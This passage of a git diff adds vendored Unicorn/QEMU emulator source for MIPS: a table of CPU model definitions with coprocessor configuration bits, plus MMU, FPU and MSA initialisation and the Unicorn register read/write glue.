*/ + MIPS_CONFIG0 | (MMU_TYPE_FMT << CP0C0_MT), + MIPS_CONFIG1 | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + + 0, + 4, + 32, + 2, + 0x1258FF17, + 0, + + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32 | ASE_MIPS16, + MMU_TYPE_FMT, + }, + { + "4KEcR1", + 0x00018400, + MIPS_CONFIG0 | (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (0 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x1278FF17, + 0, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32, + MMU_TYPE_R4000, + }, + { + "4KEmR1", + 0x00018500, + MIPS_CONFIG0 | (MMU_TYPE_FMT << CP0C0_MT), + MIPS_CONFIG1 | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x1258FF17, + 0, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32 | ASE_MIPS16, + MMU_TYPE_FMT, + }, + { + "4KEc", + 0x00019000, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (0 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3 | (0 << CP0C3_VInt), + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x1278FF17, + 0, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R2, + MMU_TYPE_R4000, + }, + { + "4KEm", + 0x00019100, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_FMT << CP0C0_MT), + MIPS_CONFIG1 | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + 
MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x1258FF17, + 0, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R2 | ASE_MIPS16, + MMU_TYPE_FMT, + }, + { + "24Kc", + 0x00019300, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3 | (0 << CP0C3_VInt), + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + /* No DSP implemented. */ + 0x1278FF1F, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R2 | ASE_MIPS16, + MMU_TYPE_R4000, + }, + { + "24Kf", + 0x00019300, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3 | (0 << CP0C3_VInt), + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + /* No DSP implemented. 
*/ + 0x3678FF1F, + 0, + 0, + (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | + (1 << FCR0_D) | (1 << FCR0_S) | (0x93 << FCR0_PRID), + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R2 | ASE_MIPS16, + MMU_TYPE_R4000, + }, + { + "34Kf", + 0x00019500, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3 | (1 << CP0C3_VInt) | (1 << CP0C3_MT) | + (1 << CP0C3_DSPP), + 0, + 0, + 32, + 2, + 0x3778FF1F, + (0 << CP0TCSt_TCU3) | (0 << CP0TCSt_TCU2) | + (1 << CP0TCSt_TCU1) | (1 << CP0TCSt_TCU0) | + (0 << CP0TCSt_TMX) | (1 << CP0TCSt_DT) | + (1 << CP0TCSt_DA) | (1 << CP0TCSt_A) | + (0x3 << CP0TCSt_TKSU) | (1 << CP0TCSt_IXMT) | + (0xff << CP0TCSt_TASID), + (0xf << CP0SRSCtl_HSS), + 0, + 32, + 32, + (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | + (1 << FCR0_D) | (1 << FCR0_S) | (0x95 << FCR0_PRID), + 0x3fffffff, + (1U << CP0SRSC0_M) | (0x3fe << CP0SRSC0_SRS3) | + (0x3fe << CP0SRSC0_SRS2) | (0x3fe << CP0SRSC0_SRS1), + 0x3fffffff, + (1U << CP0SRSC1_M) | (0x3fe << CP0SRSC1_SRS6) | + (0x3fe << CP0SRSC1_SRS5) | (0x3fe << CP0SRSC1_SRS4), + 0x3fffffff, + (1U << CP0SRSC2_M) | (0x3fe << CP0SRSC2_SRS9) | + (0x3fe << CP0SRSC2_SRS8) | (0x3fe << CP0SRSC2_SRS7), + 0x3fffffff, + (1U << CP0SRSC3_M) | (0x3fe << CP0SRSC3_SRS12) | + (0x3fe << CP0SRSC3_SRS11) | (0x3fe << CP0SRSC3_SRS10), + 0x3fffffff, + (0x3fe << CP0SRSC4_SRS15) | + (0x3fe << CP0SRSC4_SRS14) | (0x3fe << CP0SRSC4_SRS13), + 0,0, + CPU_MIPS32R2 | ASE_MIPS16 | ASE_DSP | ASE_MT, + MMU_TYPE_R4000, + }, + { + "74Kf", + 0x00019700, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + 
MIPS_CONFIG2, + MIPS_CONFIG3 | (1 << CP0C3_DSP2P) | (1 << CP0C3_DSPP) | + (0 << CP0C3_VInt), + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x3778FF1F, + 0, + 0, + (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | + (1 << FCR0_D) | (1 << FCR0_S) | (0x93 << FCR0_PRID), + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R2 | ASE_MIPS16 | ASE_DSP | ASE_DSPR2, + MMU_TYPE_R4000, + }, + { + /* A generic CPU providing MIPS32 Release 5 features. + FIXME: Eventually this should be replaced by a real CPU model. */ + "mips32r5-generic", + 0x00019700, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_MSAP), + MIPS_CONFIG4 | (1U << CP0C4_M), + 0, + MIPS_CONFIG5 | (1 << CP0C5_UFR), + (0 << CP0C5_M) | (1 << CP0C5_K) | + (1 << CP0C5_CV) | (0 << CP0C5_EVA) | + (1 << CP0C5_MSAEn) | (1 << CP0C5_UFR) | + (0 << CP0C5_NFExists), + 0, + 0, + 0, + 4, + 32, + 2, + 0x3778FF1F, + 0, + 0, + (1 << FCR0_UFRP) | (1 << FCR0_F64) | (1 << FCR0_L) | + (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | + (0x93 << FCR0_PRID), + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R5 | ASE_MIPS16 | ASE_MSA, + MMU_TYPE_R4000, + }, +#if defined(TARGET_MIPS64) + { + "R4000", + 0x00000400, + /* No L2 cache, icache size 8k, dcache size 8k, uncached coherency. */ + (1 << 17) | (0x1 << 9) | (0x1 << 6) | (0x2 << CP0C0_K0), + /* Note: Config1 is only used internally, the R4000 has only Config0. */ + (1 << CP0C1_FP) | (47 << CP0C1_MMU), + 0, + 0, + 0,0, + 0,0, + 0, + 0, + 0xFFFFFFFF, + 4, + 16, + 2, + 0x3678FFFF, + 0, + 0, + /* The R4000 has a full 64bit FPU but doesn't use the fcr0 bits. 
*/ + (0x5 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 40, + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS3, + MMU_TYPE_R4000, + }, + { + "VR5432", + 0x00005400, + /* No L2 cache, icache size 8k, dcache size 8k, uncached coherency. */ + (1 << 17) | (0x1 << 9) | (0x1 << 6) | (0x2 << CP0C0_K0), + (1 << CP0C1_FP) | (47 << CP0C1_MMU), + 0, + 0, + 0,0, + 0,0, + 0, + 0, + 0xFFFFFFFFL, + 4, + 16, + 2, + 0x3678FFFF, + 0, + 0, + /* The VR5432 has a full 64bit FPU but doesn't use the fcr0 bits. */ + (0x54 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 40, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_VR54XX, + MMU_TYPE_R4000, + }, + { + "5Kc", + 0x00018100, + MIPS_CONFIG0 | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (31 << CP0C1_MMU) | + (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | + (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x32F8FFFF, + 0, + 0, + 0, + 0, + 42, + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS64, + MMU_TYPE_R4000, + }, + { + "5Kf", + 0x00018100, + MIPS_CONFIG0 | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (31 << CP0C1_MMU) | + (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | + (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + + 0, + 4, + 32, + 2, + 0x36F8FFFF, + 0, + 0, + /* The 5Kf has F64 / L / W but doesn't use the fcr0 bits. */ + (1 << FCR0_D) | (1 << FCR0_S) | + (0x81 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 42, + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS64, + MMU_TYPE_R4000, + }, + { + "20Kc", + /* We emulate a later version of the 20Kc, earlier ones had a broken + WAIT instruction. 
*/ + 0x000182a0, + MIPS_CONFIG0 | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT) | (1 << CP0C0_VI), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (47 << CP0C1_MMU) | + (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | + (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | + (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,.0, + 0,0, + 0, + 0, + 0, + 0, + 32, + 1, + 0x36FBFFFF, + 0, + 0, + /* The 20Kc has F64 / L / W but doesn't use the fcr0 bits. */ + (1 << FCR0_3D) | (1 << FCR0_PS) | + (1 << FCR0_D) | (1 << FCR0_S) | + (0x82 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 40, + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS64 | ASE_MIPS3D, + MMU_TYPE_R4000, + }, + { + /* A generic CPU providing MIPS64 Release 2 features. + FIXME: Eventually this should be replaced by a real CPU model. */ + "MIPS64R2-generic", + 0x00010000, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (63 << CP0C1_MMU) | + (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | + (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | + (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3 | (1 << CP0C3_LPA), + 0,0, + 0,0, + 0, + 0, + 0, + 0, + 32, + 2, + 0x36FBFFFF, + 0, + 0, + (1 << FCR0_F64) | (1 << FCR0_3D) | (1 << FCR0_PS) | + (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | + (1 << FCR0_S) | (0x00 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 42, + /* The architectural limit is 59, but we have hardcoded 36 bit + in some places... + 59, */ /* the architectural limit */ + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS64R2 | ASE_MIPS3D, + MMU_TYPE_R4000, + }, + { + /* A generic CPU supporting MIPS64 Release 6 ISA. + FIXME: Support IEEE 754-2008 FP and misaligned memory accesses. + Eventually this should be replaced by a real CPU model. 
*/ + "MIPS64R6-generic", + 0x00010000, + MIPS_CONFIG0 | (0x2 << CP0C0_AR) | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (63 << CP0C1_MMU) | + (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | + (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | + (0 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3 | (1 << CP0C3_RXI) | (1 << CP0C3_BP) | + (1 << CP0C3_BI) | (1 << CP0C3_ULRI) | (1U << CP0C3_M), + MIPS_CONFIG4 | (0xfc << CP0C4_KScrExist) | + (3 << CP0C4_IE) | (1 << CP0C4_M), + 0, + 0, + (1 << CP0C5_SBRI), + 0, + 0, + 0, + 0, + 32, + 2, + 0x30D8FFFF, + 0, + 0, + (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | + (1 << FCR0_D) | (1 << FCR0_S) | (0x00 << FCR0_PRID) | + (0x0 << FCR0_REV), + 0, + 42, + /* The architectural limit is 59, but we have hardcoded 36 bit + in some places... + 59, */ /* the architectural limit */ + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, + (1 << CP0PG_IEC) | (1 << CP0PG_XIE) | + (1U << CP0PG_RIE), + 0, + CPU_MIPS64R6, + MMU_TYPE_R4000, + }, + { + "Loongson-2E", + 0x6302, + /*64KB I-cache and d-cache. 4 way with 32 bit cache line size*/ + (0x1<<17) | (0x1<<16) | (0x1<<11) | (0x1<<8) | (0x1<<5) | + (0x1<<4) | (0x1<<1), + /* Note: Config1 is only used internally, Loongson-2E has only Config0. */ + (1 << CP0C1_FP) | (47 << CP0C1_MMU), + 0, + 0, + 0,0, + 0,0, + 0, + 0, + 0, + 0, + 16, + 2, + 0x35D0FFFF, + 0, + 0, + (0x5 << FCR0_PRID) | (0x1 << FCR0_REV), + 0, + 40, + 40, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_LOONGSON2E, + MMU_TYPE_R4000, + }, + { + "Loongson-2F", + 0x6303, + /*64KB I-cache and d-cache. 4 way with 32 bit cache line size*/ + (0x1<<17) | (0x1<<16) | (0x1<<11) | (0x1<<8) | (0x1<<5) | + (0x1<<4) | (0x1<<1), + /* Note: Config1 is only used internally, Loongson-2F has only Config0. 
*/ + (1 << CP0C1_FP) | (47 << CP0C1_MMU), + 0, + 0, + 0,0, + 0,0, + 0, + 0, + 0, + 0, + 16, + 2, + 0xF5D0FF1F, /*bit5:7 not writable*/ + 0, + 0, + (0x5 << FCR0_PRID) | (0x1 << FCR0_REV), + 0, + 40, + 40, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_LOONGSON2F, + MMU_TYPE_R4000, + }, + { + /* A generic CPU providing MIPS64 ASE DSP 2 features. + FIXME: Eventually this should be replaced by a real CPU model. */ + "mips64dspr2", + 0x00010000, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (63 << CP0C1_MMU) | + (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | + (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | + (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_DSP2P) | + (1 << CP0C3_DSPP) | (1 << CP0C3_LPA), + 0,0, + 0,0, + 0, + 0, + 0, + 0, + 32, + 2, + 0x37FBFFFF, + 0, + 0, + (1 << FCR0_F64) | (1 << FCR0_3D) | (1 << FCR0_PS) | + (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | + (1 << FCR0_S) | (0x00 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 42, + /* The architectural limit is 59, but we have hardcoded 36 bit + in some places... 
+ 59, */ /* the architectural limit */ + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS64R2 | ASE_DSP | ASE_DSPR2, + MMU_TYPE_R4000, + }, + +#endif +}; + +static const mips_def_t *cpu_mips_find_by_name (const char *name) +{ + int i; + + for (i = 0; i < ARRAY_SIZE(mips_defs); i++) { + if (strcasecmp(name, mips_defs[i].name) == 0) { + return &mips_defs[i]; + } + } + return NULL; +} + +void mips_cpu_list (FILE *f, fprintf_function cpu_fprintf) +{ + int i; + + for (i = 0; i < ARRAY_SIZE(mips_defs); i++) { + (*cpu_fprintf)(f, "MIPS '%s'\n", + mips_defs[i].name); + } +} + +#ifndef CONFIG_USER_ONLY +static void no_mmu_init (CPUMIPSState *env, const mips_def_t *def) +{ + env->tlb->nb_tlb = 1; + env->tlb->map_address = &no_mmu_map_address; +} + +static void fixed_mmu_init (CPUMIPSState *env, const mips_def_t *def) +{ + env->tlb->nb_tlb = 1; + env->tlb->map_address = &fixed_mmu_map_address; +} + +static void r4k_mmu_init (CPUMIPSState *env, const mips_def_t *def) +{ + env->tlb->nb_tlb = 1 + ((def->CP0_Config1 >> CP0C1_MMU) & 63); + env->tlb->map_address = &r4k_map_address; + env->tlb->helper_tlbwi = r4k_helper_tlbwi; + env->tlb->helper_tlbwr = r4k_helper_tlbwr; + env->tlb->helper_tlbp = r4k_helper_tlbp; + env->tlb->helper_tlbr = r4k_helper_tlbr; + env->tlb->helper_tlbinv = r4k_helper_tlbinv; + env->tlb->helper_tlbinvf = r4k_helper_tlbinvf; +} + +static void mmu_init (CPUMIPSState *env, const mips_def_t *def) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + + env->tlb = g_malloc0(sizeof(CPUMIPSTLBContext)); + + switch (def->mmu_type) { + case MMU_TYPE_NONE: + no_mmu_init(env, def); + break; + case MMU_TYPE_R4000: + r4k_mmu_init(env, def); + break; + case MMU_TYPE_FMT: + fixed_mmu_init(env, def); + break; + case MMU_TYPE_R3000: + case MMU_TYPE_R6000: + case MMU_TYPE_R8000: + default: + cpu_abort(CPU(cpu), "MMU type not supported\n"); + } +} +#endif /* CONFIG_USER_ONLY */ + +static void fpu_init (CPUMIPSState *env, const mips_def_t *def) +{ + int i; + + for (i = 0; i < 
MIPS_FPU_MAX; i++) + env->fpus[i].fcr0 = def->CP1_fcr0; + + memcpy(&env->active_fpu, &env->fpus[0], sizeof(env->active_fpu)); +} + +static void mvp_init (CPUMIPSState *env, const mips_def_t *def) +{ + env->mvp = g_malloc0(sizeof(CPUMIPSMVPContext)); + + /* MVPConf1 implemented, TLB sharable, no gating storage support, + programmable cache partitioning implemented, number of allocatable + and sharable TLB entries, MVP has allocatable TCs, 2 VPEs + implemented, 5 TCs implemented. */ + env->mvp->CP0_MVPConf0 = (1U << CP0MVPC0_M) | (1 << CP0MVPC0_TLBS) | + (0 << CP0MVPC0_GS) | (1 << CP0MVPC0_PCP) | +// TODO: actually do 2 VPEs. +// (1 << CP0MVPC0_TCA) | (0x1 << CP0MVPC0_PVPE) | +// (0x04 << CP0MVPC0_PTC); + (1 << CP0MVPC0_TCA) | (0x0 << CP0MVPC0_PVPE) | + (0x00 << CP0MVPC0_PTC); +#if !defined(CONFIG_USER_ONLY) + /* Usermode has no TLB support */ + env->mvp->CP0_MVPConf0 |= (env->tlb->nb_tlb << CP0MVPC0_PTLBE); +#endif + + /* Allocatable CP1 have media extensions, allocatable CP1 have FP support, + no UDI implemented, no CP2 implemented, 1 CP1 implemented. 
*/ + env->mvp->CP0_MVPConf1 = (1U << CP0MVPC1_CIM) | (1 << CP0MVPC1_CIF) | + (0x0 << CP0MVPC1_PCX) | (0x0 << CP0MVPC1_PCP2) | + (0x1 << CP0MVPC1_PCP1); +} + +static void msa_reset(CPUMIPSState *env) +{ +#ifdef CONFIG_USER_ONLY + /* MSA access enabled */ + env->CP0_Config5 |= 1 << CP0C5_MSAEn; + env->CP0_Status |= (1 << CP0St_CU1) | (1 << CP0St_FR); +#endif + + /* MSA CSR: + - non-signaling floating point exception mode off (NX bit is 0) + - Cause, Enables, and Flags are all 0 + - round to nearest / ties to even (RM bits are 0) */ + env->active_tc.msacsr = 0; + + /* tininess detected after rounding.*/ + set_float_detect_tininess(float_tininess_after_rounding, + &env->active_tc.msa_fp_status); + + /* clear float_status exception flags */ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); + + /* set float_status rounding mode */ + set_float_rounding_mode(float_round_nearest_even, + &env->active_tc.msa_fp_status); + + /* set float_status flush modes */ + set_flush_to_zero(0, &env->active_tc.msa_fp_status); + set_flush_inputs_to_zero(0, &env->active_tc.msa_fp_status); + + /* clear float_status nan mode */ + set_default_nan_mode(0, &env->active_tc.msa_fp_status); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.c new file mode 100644 index 0000000..6723341 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.c @@ -0,0 +1,169 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/mips/mips.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "unicorn_common.h" +#include "uc_priv.h" + +#ifdef TARGET_MIPS64 +const int MIPS64_REGS_STORAGE_SIZE = offsetof(CPUMIPSState, tlb_table); +#else // MIPS32 +const int MIPS_REGS_STORAGE_SIZE = offsetof(CPUMIPSState, tlb_table); +#endif + +#ifdef TARGET_MIPS64 +typedef uint64_t mipsreg_t; +#else +typedef uint32_t 
mipsreg_t; +#endif + +static uint64_t mips_mem_redirect(uint64_t address) +{ + // kseg0 range masks off high address bit + if (address >= 0x80000000 && address <= 0x9fffffff) + return address & 0x7fffffff; + + // kseg1 range masks off top 3 address bits + if (address >= 0xa0000000 && address <= 0xbfffffff) { + return address & 0x1fffffff; + } + + // no redirect + return address; +} + +static void mips_set_pc(struct uc_struct *uc, uint64_t address) +{ + ((CPUMIPSState *)uc->current_cpu->env_ptr)->active_tc.PC = address; +} + + +void mips_release(void *ctx); +void mips_release(void *ctx) +{ + MIPSCPU* cpu; + int i; + TCGContext *tcg_ctx = (TCGContext *) ctx; + release_common(ctx); + cpu = MIPS_CPU(tcg_ctx->uc, tcg_ctx->uc->cpu); + g_free(cpu->env.tlb); + g_free(cpu->env.mvp); + + for (i = 0; i < MIPS_DSP_ACC; i++) { + g_free(tcg_ctx->cpu_HI[i]); + g_free(tcg_ctx->cpu_LO[i]); + } + + for (i = 0; i < 32; i++) { + g_free(tcg_ctx->cpu_gpr[i]); + } + + g_free(tcg_ctx->cpu_PC); + g_free(tcg_ctx->btarget); + g_free(tcg_ctx->bcond); + g_free(tcg_ctx->cpu_dspctrl); + + g_free(tcg_ctx->tb_ctx.tbs); +} + +void mips_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env; + (void)uc; + env = uc->cpu->env_ptr; + memset(env->active_tc.gpr, 0, sizeof(env->active_tc.gpr)); + + env->active_tc.PC = 0; +} + +int mips_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + if (regid >= UC_MIPS_REG_0 && regid <= UC_MIPS_REG_31) + *(mipsreg_t *)value = MIPS_CPU(uc, mycpu)->env.active_tc.gpr[regid - UC_MIPS_REG_0]; + else { + switch(regid) { + default: break; + case UC_MIPS_REG_PC: + *(mipsreg_t *)value = MIPS_CPU(uc, mycpu)->env.active_tc.PC; + break; + case UC_MIPS_REG_CP0_CONFIG3: + *(mipsreg_t *)value = MIPS_CPU(uc, mycpu)->env.CP0_Config3; + break; + case UC_MIPS_REG_CP0_USERLOCAL: + *(mipsreg_t *)value = MIPS_CPU(uc, 
mycpu)->env.active_tc.CP0_UserLocal; + break; + } + } + } + + return 0; +} + +int mips_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + if (regid >= UC_MIPS_REG_0 && regid <= UC_MIPS_REG_31) + MIPS_CPU(uc, mycpu)->env.active_tc.gpr[regid - UC_MIPS_REG_0] = *(mipsreg_t *)value; + else { + switch(regid) { + default: break; + case UC_MIPS_REG_PC: + MIPS_CPU(uc, mycpu)->env.active_tc.PC = *(mipsreg_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_MIPS_REG_CP0_CONFIG3: + MIPS_CPU(uc, mycpu)->env.CP0_Config3 = *(mipsreg_t *)value; + break; + case UC_MIPS_REG_CP0_USERLOCAL: + MIPS_CPU(uc, mycpu)->env.active_tc.CP0_UserLocal = *(mipsreg_t *)value; + break; + } + } + } + + return 0; +} + +DEFAULT_VISIBILITY +#ifdef TARGET_MIPS64 +#ifdef TARGET_WORDS_BIGENDIAN + void mips64_uc_init(struct uc_struct* uc) +#else + void mips64el_uc_init(struct uc_struct* uc) +#endif +#else // if TARGET_MIPS +#ifdef TARGET_WORDS_BIGENDIAN + void mips_uc_init(struct uc_struct* uc) +#else + void mipsel_uc_init(struct uc_struct* uc) +#endif +#endif +{ + register_accel_types(uc); + mips_cpu_register_types(uc); + mips_machine_init(uc); + uc->reg_read = mips_reg_read; + uc->reg_write = mips_reg_write; + uc->reg_reset = mips_reg_reset; + uc->release = mips_release; + uc->set_pc = mips_set_pc; + uc->mem_redirect = mips_mem_redirect; + uc_common_init(uc); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.h new file mode 100644 index 0000000..b1c6cac --- /dev/null +++ 